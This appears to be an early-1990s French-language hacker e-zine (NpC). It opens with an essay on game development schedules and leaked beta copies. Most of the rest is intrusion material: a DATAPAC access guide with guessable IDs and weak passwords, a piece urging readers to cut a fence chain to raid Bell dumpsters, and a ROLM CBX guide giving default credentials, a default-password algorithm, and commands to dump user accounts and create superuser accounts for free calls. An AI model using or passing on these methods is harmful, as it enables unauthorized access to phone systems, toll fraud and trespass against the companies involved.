ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³78³ 6h ³ ³Y ³100% ³ Select NPC map location ³ 12/3/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³79³18h ³ ³Y ³100% ³ Set game time ³ 8/7/91³21 ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³80³18h ³ ³Y ³100% ³ Schedular revisions ³ 12/5/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³81³18h ³6h ³ ³ 0% ³Item data set & store ³ 8/9/91³79 ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³82³18h ³ ³Y ³100% ³Type data set & store ³ 12/5/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³83³18h ³ ³Y ³100% ³NPC data set & store ³ 12/5/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³84³12h ³ ³Y ³100% ³Item/terrain select via TM collide³ 5/30/91³ ³
ÀÄÄÁÄÄÄÄÄÁÄÄÄÄÁÄÄÄÄÁÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÁÄÄÄÄÙ
La grille que vous avez sous les yeux reprsente, je crois, une
infime partie du calendrier de dveloppement d'un jeu que vous avez
tous apprci, ELVIRA II, The Jaws of Cerberus, par Accolade.
J'avais nagure ramass
au dtour d'une visite sur un bab U.S...
Je vous la reproduit ici pour vous permettre de saisir, en un seul
coup d'oeil, l'ampleur d'une tche de programmation pour un jeu de
cette magnitude. Quelques constatations peuvent d'ores et dj
tires
la vue d'une telle grille:
1) Un jeu informatis n'est pas une oeuvre d'art. Bien au
contraire, chacune des tches est rpartie, pas ncessairement
squentiellement, selon le principe du travail
la chane. Le
processus suit un ordre logique, mais, comme vous le voyez, la
tche de la ligne 67 a t ralise AVANT celle de la ligne 66...
2) Le nombre d'heures qu'exige chaque tape semble avoir t
dtermin plutt arbitrairement. On met 12 heures partout, sauf l
o
devient trop ridicule...
3) Le nombre de personnes travaillant
chacune des tapes du
projet n'est pas dtermin. On se doute bien, pourtant, que ce
n'est pas une seule et mme personne qui a ralis le soft dans son
entiret. On se doute aussi que deux tapes peuvent tout de mme
tre ralises simultanment, puisque celui qui dessine les
personnages n'est probablement pas le mme que celui qui fait les
menus. Une rpartition un tant soit peu logique du travail
exigerait un tel arrangement, sans compter que la polyvalence n'est
pas souvent de mise dans une quipe de production: c'est pas parce
que tu es capable de dessiner les lolos de Elvira que tu es capable
de crer le systme pour l'inventaire des objets...
Mais cessons cette analyse l
, voulez-vous, et venons-en
la
conclusion: si ce genre de calendrier constitue l'outil principal
de l'quipe de relations publiques pour les aider
btir une
campagne publicitaire, il n'est pas tonnant que les promesses de
celle-ci ne correspondent que rarement aux promesses de celui-l
...
Surtout que, contrairement
l'extrait que nous avons
laborieusement reproduit (vivement un scanner!), les calendriers de
travail fournis aux quipe de P.R. sont gnralement vierges, parce
qu'ils sont distribus AU DBUT du projet, et que les heures
EFFECTIVEMENT compltes ne sont pas encore entres...
Un dernier mot sur la ralisation d'un soft: les versions... J'ai
encore vu, rcemment, dans la messagerie d'un bab, pirate je crois,
quelqu'un qui demandait ce qu'tait une version BETA... Rien de
plus simple, vraiment: gnralement, ds que les dessins, les
sketchs des dcors et des personnages sont complts, on tire une
copie ALPHA du projet. On va retrouver sur cette copie ALPHA tous
les tableaux de transition non-anims, les backgrounds des scnes
o le hros va se promener, et des plans FIXES du personnage dans
diverses positions et profondeurs de champ. C'est probablement de
la copie ALPHA, d'ailleurs, que le premier dmo de Strike Eagle III
a t tir...
Ds que les animations du jeu sont prtes, et qu'un prototype
fonctionnel est ralis, on en tire une copie BETA, qui sera
soumise
toute une srie de testeurs. C'est cette mme copie qui
est distribue aux magazines habilits
tester les soft pour des
"first looks". Et c'est toujours cette mme copie qui atterrit
gnralement sur votre bab pirate favori... et sur votre machine...
Et c'est simple de comprendre pourquoi: une copie BETA circule hors
de l'entreprise qui l'a produit, et elle circule entre des
centaines de mains. Certaines de ces mains en profitent
naturellement pour se graisser au passage en copiant la copie et en
la laissant traner sur le bab WHQ d'un groupe de distribution...
Mais autrement, que se passe-t-il avec cette version BETA? Les
testeurs patents la triture, la maltraite, lui font subir les
pires svices, tentent de garrocher les personnages au travers des
armoires, bref, c'est pas la joie! Ces mmes testeurs font ensuite
un rapport
la compagnie sur les bugs qu'ils ont dcel. Si on
peut corriger tout
du premier coup, on passe
la production
proprement dite et
la distribution du soft. Sinon, on produit une
deuxime version pour fins de tests, la copie GAMMA... Mais c'est
rare, avec les retards qui se sont accumuls, qu'on en vient
produire une telle version. La pression des distributeurs et du
public est gnralement trs grande, et les compagnies vont
prfrer tenter rparer tous les bugs du premier coup, quitte, nous
en avons parl en introduction,
envoyer dans le champ des copies
qui vont ncessiter des dizaines de rvisions...
Pour mieux comprendre, en dfinitive, la diffrence qui peut
exister entre une copie BETA et un produit fini, tentez de mettre
la main sur la version BETA de D-GENERATION, et comparez-la avec le
produit fini... Vous allez constater une GROSSE diffrence...
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ
ON SAUVE EN FRAIS DE RECYCLAGE DEPUIS QUE NPC TRASHE CHEZ NOUS!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Introduction
l'introduction
...
ÚÚÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿¿¿
ÄÄÄÄÄÄÄÄÄÄÄÄ´³³ Hacking DATAPAC ³³ÃÄÄÄÄÄÄÄÄÄÄÄ
ÀÀÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙÙÙ
þ Part One
þ By: Fairy Dst
Hello les mecs! Eh oui, aprs une courte absence, je me suis
retrouss les manches pour vous trouver un sujet intressant... du
moins, je le crois! J'ai tout dernirement lch la drogue (trop de
dommages crbraux). Ca m'a permis d'exploiter un talent cach que
je possdais, un talent de hacker. Eh oui, je ne me considre plus
comme un drogu (en tais-je bien un ?) mais bien un hacker qui
peut srement vous en apprendre un peu...
Ca faisait deux semaines que je me creusait la tte pour me
trouver un sujet potable, voire mme intressant (car je voulais
bien entendu contribuer
ce numro de NpC!). Alors j'explorais les
quelques VRAIS boards o j'ai accs, mais des boards H/P, ca
pousse pas partout! Ainsi, j'ai remarqu que ca brassait un peu
fort conernant les DATAPACs sur The Workshop. Ouaip, ca a l'air
d'intresser
pas mal de monde ce systme. Alors, j'ai retrouss mes manches de
camisole et
je me suis mis
la recherche d'informations
propos de ce
systme, qui est en passant desservi par le Bell lui-mme! Ce que
j'ai trouv est fort intressant et vous permettera d'accder
des
informations fort utiles si :
- Vous voulez devenir millionnaires (Sans jokes!)
- Vous avez soif de donnes
- Ou bien vous avez tout simplement soif de Hacker (comme
moi d'ailleurs!)....
Pour terminer, je vais peut-tre choquer quelques lecteurs, mais la
suite de mon article se droulera en anglais, pour plaire
tous...
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ
³ GLOSSARY
DATAPAC
A Nationwide, universally available, packet switching,
shared, data network offered by Telecom Canada (Bell).
DATAPAC 31O1
A service which enables teletypewriter compatible
devices
(eg. Personal Computers) to access the DATAPAC network
via a public dial port.
ID (Identifier)
Your PROFS or CMS account name.
NUI (Network User Identifier)
A method of identifying a user on a DATAPAC 31O1 public
dial port.
PACKET/327O
A software package which allows your Personal computer
to access our IBM host mainframe by emulating an IBM
327O terminal.
PACKET/74
A software package offered by PACKET/PC Inc., which is
the IBM host mainframe interface for PACKET/327O.
VTAM
(Virtual Telecommunication Access Method)
This is an IBM software that handles terminal data and
access on our IBM host mainframe.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
³ ACCESSING THE SYSTEM
First of all you must have PACKET/327O. This is a program
which allows you access to the network by entering a simple
command. Without it, you don't go anywhere. This program is not a
public program. Only authorized persons can get this software. If
you want it, work by yourself. If i get it, you can too. So good
luck! We'll probably u/l a copy of it on a few H/P boards, so...
Ok, once entering the system, you'll see something like this:
Packet 327O Vesion 3.3.2 12/O2/88 (c) Copyright 1987, Packet/Pc Inc
DATAPAC, Canada automatic logon procedure
Resetting your modem...
Dialing XXX-XXX at XXX baud
You have a modem connection at XXX baud
Connecting to DATAPAC
Signing on to the host...
Once you have successfully completed the access process, a
screen is present with the cursor in the ID:____ field. Now, you
need a PROFS and a CMS ID. PROFS ID is very simple to found. Just
try numbers like:
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ PROFS NUMBER ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ 00006889 00006978 ³
³ G1GX4WX4 T5YR657Y ³
³ J2E5RT78 WER34ER5 ³
³ GY7T67YT 418YNU8Y ³
³ L9OI08UY B3F56TR6 ³
³ Y1Y54R67 T6Y7RU6R ³
³ 00006883 G9HKJPY4 ³
³ 00006881 00006884 ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
But, to find an CMS password is more difficult. Try simple
words
like: GIGI, DOOM, or try any first name like RICHARD, LINDA, or
anything else...You will be allowed 6 attempts to enter the proper
ID and password before you are disconnected. ANY INVALID ATTEMPTS
TO
SIGN ON ARE RECORDED AND CHECKED BY SECURITY ADMINISTRATORS...
Mais, que peut-on retrouver dans un Network comme ca? Eh bien,
en premier lieu des chiffres d'affaires, des informations
personnelles sur les employs et le PDG, des scoops qui vont sortir
le lendemain dans le Washington Post, des crits indits, etc...
Mais on ne hacke pas seulement pour les infos, mais bien pour le
plaisir de le faire... Donc, je vous laisse le temps de trouver
Packet/327O qui est indispensable pour connecter au Canada. D'ici
l
, je vous tape une belle deuxime partie contenant entre-autre
les fonctions disponibles via DATAPAC (Tymnet, ect...) Goodbye and
see ya in the next issue!
[Blitz- Come on, Fairy! Tu es capable de nous faire quelque chose
de plus consistant la prochaine fois!]
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ
LES DATAPACs? C'EST A NOUS CA?!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
TRASHING BELL STYLE
OU
LA SEMAINE VERTE
par
-=ThE PoSSe=-
Quelques nouvelles brves sur le Bell et sur le phreak, comme a,
en passant...
---------
Comme vous le savez si bien, NpC frquente seulement l'lite
internationale. Par hasard, un certain vendredi, lorsque nous
tions en train de nous procurer notre ration bi-mensuelle de sacs
verts, nous fmes surpris de rencontrer le prfr de tous. Un mec
sympathique, coiff d'une tuque de la mme couleur que nos sacs.
Vous avez srement tous reconnu Jon Bon Jovi. Comme quoi le
trashing conduit
la clbrit...Keep the faith.
----------------
Bell a instaur un programme de reconnaissance et service, appel
"LE CINQ TOILES", pour rcompenser, antre autres, les bons coups
de leurs employs. Quel genre de bon coup, me demanderez-vous:
voici quelques exemples...
INSTALLATION ET RPARATION - SUD-OUEST
Steven Ligety, technicien -service d'affaires I
A la suite d'une conversation avec une employe d'un
tablissement en srieuse difficult financire, Steven a jug
propos de communiquer l'information au groupe de la Perception -
march d'affaires. Une raction immdiate s'ensuivit, qui permit de
percevoir des sommes de l'ordre de 10 000 $ en un temps record et
d'obtenir des garanties. Le jugement de Steven a donc protg les
revenus de Bell.
[Quand on vous disait que la dlation, certains avaient a dans le
sang! -Blitz]
VENTE ET SERVICE -MARCHE D'AFFAIRES - SUD-OUEST
Marc Lapointe, reprsentant en communications
La direction du groupe Perception Nord-Est tenait
fliciter
Marc pour sa perspicacit. Et pour cause! Jugez-en sur les propos
suivants:
"En fvrier '92, Marc ngociait une demande de dmnagement
ainsi que l'installation d'un systme tlphonique pour un client.
Une fois les efforts dploys et la vente conclue, il reoit un
chque de dpt de 3 500 $. Ayant des doutes sur la solvabilit du
client, Marc a communiqu avec la perception. Un appel
la banque
du client a confirm qu'il n'y avait pas d'argent dans le compte de
banque. Marc a d annuler la commande ainsi que sa vente".
Marc a prouv que mme si les ventes reprsentent la nature
mme de ses fonctions, la protection des revenus est d'une gale
importance.
[Bon sang! Ils ont rig a en systme! -Blitz]
ASSISTANCE-ANNUAIRE
Denis Castonguay, assistant au service remplaant (87 Ontario)
Denis a contribu
dmasquer un rseau de jeunes fraudeurs
qui,
l'aide d'un ordinateur, s'introduisaient dans des botes
vocales de Bell et d'Hydro-Qubec pour ensuite en ressortir et
faire des appels d'urgence fictifs au 9-1-1 ou des appels outre-
mer. Faisant preuve de doigt, il leur a fait dvoiler certains
dtails qui ont par la suite permis au groupe de la Sret de
remonter la filire, d'tablir des preuves et d'aviser les parents
avant de dmanteler ce rseau. Bel exemple de perspicacit.
[Bel exemple de connerie, oui! Qu'avaient donc ces pirates
discuter avec un oprateur du Bell? Ce sont des couillons qui
mritaient de se faire pincer, tiens! -Blitz]
TOPS B
Nancy Allaire, tlphoniste, Maurice Bliveau, conducteur semi-
remorque (matriel), Guy Delorme, monteur de lignes, Manon Filion,
tlphoniste, Sylvain Henry et Michel Y. Laveault, rparateurs de
cbles, et Robert Rajotte, technicien -service d'affaires I
Dans le cadre de la journe "Kino de l'entreprise" se tient
une parade de chars allgoriques mettant en valeur les diverses
activits ralises par les entreprises de la rgion de
Victoriaville. Grce
nos sept bnvoles, et ce pour la premire
fois, un char illustrant les divers services rendus par Bell
ses
clientles participe au dfil et remporte le prix du plus beau
vhicule allgorique.
[Nul doute qu'on a d parader les fraudeurs et les mauvais payeurs
sur ce char, attachs
un pilori: il faut bien illustrer les
services du Bell! -Blitz]
On arrte l
cette description tire de la revue "Le cinq toiles"
(rdige par Brigitte Roberge), parce que je crois que je vais me
mettre
pleurer...
--------------------
Pour les plus furieux trashers d'entre vous, voii notre meilleure
adresse: 175 St-Sacrement... C'est le bureau de Bell responsable de
l'installation dans toutes les places d'affaires, et des
tlphones, et des systmes-voix, et des PBX... Des poubelles en
or!
Mais... la place est clture, claire, un peu inquitante, quoi.
Vous n'y couperez pas, les kids, ou plutt si, vous allez devoir
couper la chane qui ferme la porte grillage de la clture, si
vous voulez y avoir accs. Mais a en vaut la peine: en une seule
rafle, nous avons mis la main sur des quipements briss, les
manuels de tous les systmes tlphoniques que le Bell vend aux
compagnies, etc.
A vous de juger si le jeu en vaut la chandelle...
------------------
Mine de rien, sans en parler
personne (sneaky guys!), Bell a
dcid de baisser le seuil de tolrance de ses factures impayes.
Le CTRC a accept que Bell rclame des intrts pour des factures
de 20 $ depuis le dbut de fvrier, au lieu du 50 $ qui tait le
seuil prcdent. Le saviez-vous?
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ
ON N'A PLUS DE SECRET POUR VOUS. FORCEMENT...
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
LES PBX PASSENT AU DIGITAL
ROLM-CBX
By Silicon Phreaker / UPI
0.00
-= DCLARATION =-
Ce fichier contient des informations qui ne devraient tre
considres qu'
titre indicatif. Je ne saurais encourager
l'application de ces techniques, car elles sont illgales. Je ne
saurais donc assumer aucune responsabilit
propos de
l'utilisation de ces informations.
-= FIN DE LA DCLARATION =-
0.50
- Table des Matires -
Dclaration.............................................. 0.00
Table des Matires....................................... 0.50
Introduction............................................. 1.00
Ce qu'est un CBX......................................... 1.10
Pntrer dans un ROLM CBX................................ 1.20
Que peut-on faire une fois
l'intrieur?................ 1.30
Utiliser l'interface de configuration interactive (ICI).. 1.40
Accder
la liste des Trunk............................. 1.50
Accder
la liste des Usagers........................... 1.60
Crer de nouveaux Acomptes............................... 1.70
Accder
la liste du Hardware........................... 1.80
Accder
la liste des Lignes Data & Setup............... 1.90
Conclusion............................................... 2.00
1.00
- Introduction -
Salut les potes! Bienvenue dans ce guide des ROLM-CBX. Une partie
de ce texte (principalement les mots de passe standards) provient
de l'intro d'un T-file crit par Tracer. Il faut donner le crdit
l
o il est d.
La raison qui m'a pouss
crire ce texte? Je considre qu'il n'y
avait pas encore eu un bon texte sur les ROLM-CBX, un long texte
qui couvrirait vraiment l'ensemble du sujet.
Alors, le texte qui suit peut tre considr comme une somme en la
matire,
dfaut de possder le manuel original. En esprant que
vous le trouviez pratique et qu'il puisse vous donner un coup de
main lors de votre prochaine incursion dans le "cyberspace"...
1.10
- Ce qu'est un CBX -
CBX veut dire "Computerized Branch Exchange". En d'autres mots,
c'est un PBX qui fonctionne
partir d'un ordinateur.
Habituellement, un CBX pourra contrler, au choix, un PBX local o
pour les longues distances, ainsi que toute une varit de
services, comme la messagerie vocale et le systme tlphonique de
la compagnie
l'interne.
Le CBX peut aussi excuter toute une srie de commandes standard,
comme les renvois d'appel, les dial-in et les dial-out. Un usage
possible du CBX, par exemple, peut tre de le programmer afin qu'il
effectue un renvoi d'appel vers un PBX longue-distance
partir
d'un dial out.
En bref, les possibilits qu'offre un CBX
tout bon hacker ne sont
dfinies que par les limites de son imagination.
1.20
- Pntrer dans un ROLM-CBX -
Quand vous entrez et que vous loggez sur un tel systme, voici la
premire chose que vous apercevez en en-tte:
ROLM CBX SITE ID: SEARS31332
RELEASE: 9004.4.20 BIND DATE: 19/DEC/88
COPYRIGHT (C) ROLM CORPORATION, 1987
ALL RIGHTS RESERVED - PROPERTY OF ROLM CORPORATION
03:34:55 ON MONDAY 6/22/1992 33 DEGREES C
Lorsque le systme demandera le nom d'usager, entrez: ENG
Maintenant, pour trouver le mot de passe par dfaut (standard),
prenez le jour du mois de l'en-tte (22), ajoutez-y le numro de
node (habituellement 1), plus le premier chiffre de la minute (ici
0). Dans le cas prsent, le total est 23. Utilisez le dernier
chiffre de ce total (3) en le plaant comme le premier chiffre du
mot de passe. Ajoutez maintenant les caractres suivants (WID), le
numro du systme (ici 31332) et la premire lettre du mois courant
(F).
Dans le cas prsent, le mot de passe devrait ressembler
:
3WID31332F
Si cette technique arcane, mais authentique ne fonctionne pas pour
vous, essayez le truc suivant.
USERNAME: SU
PASSWORD: SUPER
ou
USERNAME: SYSADMIN
PASSWORD: ROLM ou ROLM-VLCBX ou SYSADMIN
1.30
- Utiliser le CBX -
Le prompt pour un CBX va comme suit :
%.
La commande pour accder au Help est : ?
Le Help devrait vous prsenter la liste des commandes suivantes :
ABORT ACTIVATE ATTR BYE
CANCEL CARD CDRSM CDT
CHANGE CHG CLEAR CLR
CMPCT CMSTS CNCL CNFG
CONVERT COPY CPEG CTMON
CTRA CTRTL CXCLR COPY
CXCLR CXCON CXNET DACK
DADD DAEVT DANS DBDMP
DCAT DCF DCOM DDMA
DDQ DDT DE
DEACTIVATE
DEFINE DELETE DEMOUNT DESUM
DEX DFACK DFCOM DFEAT
DFEVT DHTQ DHWS DIAG
DIQ DISABLE DIWQ DKQ
DML DMNT DMS DMTST
DOWN DPATR DPMR DPMS
DPPRI DPTR DQQ DRCT
DREGS DSBLE DSQ DSST
DSTAK DTCB DTDQ DWQ
DX_TR ENABLE ENB ENBLE
ETIO EX EXM EXN
EXP EXPAND FINIT FORMAT
FREER FSD GTOD HDBST
HELP INSTALL KPFA LCT
LIST LOAD LOGOFF LOGON
LPEG LPKT LSCT LSL
LST LTCB MNT MONITOR
MOUNT MTRACE NEXT NSTAT
PAGE PCNFG PDIO PFA
PKTS PLIST PLTT PPFA
PS PSH QAT QITM
QTEST RCT RECEIVE RENAME
REPLY RESTART RESTORE REVERSE
RM RMOFF RPFA RSC
RSCLK RSTOR RSTRT SAT
SCAN SEND SETD SHOW
SITM SOCON SOUNC SSAT
START STATE STATUS STEST
STOD STOP STRT STS
TDCD TEST TKSTS TRTL
TST TX UNLK UNLOCK
UP VERIFY XDEF XMIT
XPND
Toutes ces commandes peuvent tre places
partir du prompt %.
Certaines pourrait, dpendant de la configuration du systme, tre
hors d'usage, ou pourraient ne pas tre, tout simplement,
disponibles, si vous n'tes pas en mode diagnostic (DIAG).
Nous allons maintenant porter notre attention sur l'interface de
configuration interactive (ICI), qui joue une part vitale dans le
fonctionnement du CBX.
1.40
- Utiliser le ICI -
Au prompt, entrer la commande CNFG.
% CNFG
Une en-tte va apparatre. Elle devrait ressembler
ceci :
CBX/9000
INTERACTIVE CONFIGURATION INTERFACE
15:14:32 ON MONDAY 6/22/1992
COMMAND:
Ceci est le prompt principal. Si vous excutez la commande ? , vous
allez obtenir la liste des fonctions suivantes :
MODIFY, CREATE, LIST, CHECK, EXIT, DONE, RESET, REBUILD.
En entrant une de ces commandes, vous allez obtenir le prompt
suivant :
NOUN:
Vous pouvez alors entrer "?" ou "ALL", qui jouent le rle de
"wildcard". Une liste des fonctions de configuration devrait
apparatre :
BUTTON_120 BUTTON_240 CDR_EXCLUDE
CNFG_ERRORS
CNFG_QUEUE CNFG_STATUS CNFG_USERS
COM_GROUP
COS_FEAT DATA_ESS DATA_DEVICE
DATA_GROUP
DATA_LINE DATA_SUBMUX DLI ETS
EXTEN FAC FAC_TYPE FAMILY
FEAT_CODE FIRST_DIGIT HD_GROUP LEX
LOGON_PROFILE MAP MEM_PARTS PARAM
PICK POWER Q_TYPE ROUTE_LK
RP RPD RPI
RPS_120S_ON
RPS_240S_ON SAT_NAME SEARCH_SEQ SECTION
SECURITY_GROUP SERVICE_LIST SIO_PARTS SLI
SPEED T1D3 T1D3_GRP TRUNK
TRUNK_GROUP VPC
% CREATE LOGON_PROFILE
ENTER NAME (1-12 CHAR): TEST
ENTER PASSWORD: TEST
RETYPE: TEST
Ensuite, le systme va vous demander un nom de "famille". Si vous
voulez obtenir un accs "SuperUsager", tapez
"SYSTEM_ADMIN"
Aprs, la machine devrait maintenant vous demander un "verbe". Les
verbes sont les fonctions, ou commandes, que l'usager identifi
dans la "famille" peut utiliser. Des flags en quelque sorte...
Toujours pour votre futur acompte "SuperUsager", entrez "SU" pour
avoir accs
toutes les commandes.
Pour obtenir une liste des usagers online au moment de votre appel,
essayez ceci:
% LIST CNFG_USERS
NUMBER OF USERS MAX NUMBER OF USERS
3 5
PORT USER_NAME START_TIME HOW_LONG
17 SU 17:47:57 0:28:34
2 FIELD 18:16:03 0:0:28
3 MARYB 18:16:03 0:10:03
1.50
- Accder
la liste des Trunks -
En tout premier lieu, vous n'aviez bien sr appel sur ce systme
que pour utiliser le PBX, et non pas pour vous promener sur le
systme ou pour vous crer des acomptes. Eh bien, vous allez tre
servi! Pour obtenir le listing des trunks qui donnent accs au PBX,
vous faites cette simple commande,
partir du prompt du ICI :
COMMAND: LIST
NOUN: TRUNK
PAD: ALL
Vous allez avoir toute une srie d'informations diverses, la
plupart de celles-ci concernant les numros de nodes et les
secteurs. Il vous faut en fait chercher, dans ce fouillis, une
information semblable
celle-ci :
TRUNK IDENTIFICATION NAME
------------------------------ ----------------
DS RJ 2/11 352-0515 CO
START END CHECKS PASS INTCEPT
TIME TIME ACT FAC WORD EXTN
----- ----- - - ---- -------
DS 00:00 23:59 N N 1357 255
Prenez en note le numro d'identification du Trunk ainsi que son
code, et vous avez maintenant un PBX qui n'attend que vos ordres...
1.60
- Accder
la Liste des usagers -
Maintenant, vous voulez trouver un acompte pour un de vos amis?
Facile comme bonjour! Voici comment :
A partir du ICI, faites :
COMMAND: LIST
NOUN: LOGON_PROFILE
PAD: ALL
Vous allez obtenir la liste complte des acomptes existants, avec
les mots de passe et la liste des privilges pour chacun.
1.70
- Crer de nouveaux acomptes -
% CREATE LOGON_PROFILE
ENTER NAME (1-12 CHAR): ACCOUNT_NAME
ENTER PASSWORD: PASSWORD
